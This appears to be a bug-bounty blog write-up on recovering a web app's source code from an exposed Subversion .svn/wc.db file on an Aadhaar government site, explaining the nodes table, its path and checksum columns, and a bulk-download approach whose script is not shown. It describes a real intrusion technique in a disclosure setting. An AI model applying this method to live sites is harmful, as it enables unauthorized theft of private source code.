+1 (512) 588 6950
Hi Guys, I recently found a .svn/wc.db folder exposed on a resident.uidai.gov.in, and used it to reconstruct the Web app’s source code. I cannot find any article about svn, So this will be very useful for those who find svn on a website.
what is .svn/wc.db?
The .svn/wc.db file is a database file used by Subversion, a version control system and it contains information about the state of the working copy, including the revision numbers of the files, the dates and times when they were last updated, and any local modifications that have been made. It is used by Subversion to track changes to the files in the working copy and to manage the process of merging changes from the repository into the working copy.
what is the Difference between .svn/wc.db and .git ?
.svn/wc.db is a database file used by Subversion, a centralized VCS
.git, on the other hand, is a database file used by Git, a distributed VCS
Note: I haven’t used any directory or file brute-forcing. I used a chrome extension called DotGit which automatically finds .git and .svn in a website while surfing.
Let’s Look at How I downloaded all the source codes of an Aadhar website
I just appended .svn/wc.db to https://resident.uidai.gov.in and downloaded the database file
when I opened the database file with SQLite browser. I came occurs a lot of tables.
The nodes table contains many columns but 2 important columns are “local_relpath” and “checksum”
local_relpath →It contains the path of a web app
checksum → It contains a checksum value of the path
local_relpath = /Bio-Lock-Enable.php
checksum = $sha1$c7fb9f76455733203cb734de0c6016366d729458
I know that SVN keeps a backup copy of all files in a one location
It is easy to download a single file with wget command. but I have more than 500 paths.so I wrote a simple script to download all the source code.
link to the below code ↓
Finally, I got the complete source code of the Aadhar website.
The Indian government has fixed the issue and I encourage ethical hacking practices.
Here are some more good resources:
Special thanks to Dinesh Kumar for guiding me.
Thanks for taking the time to read my write-up.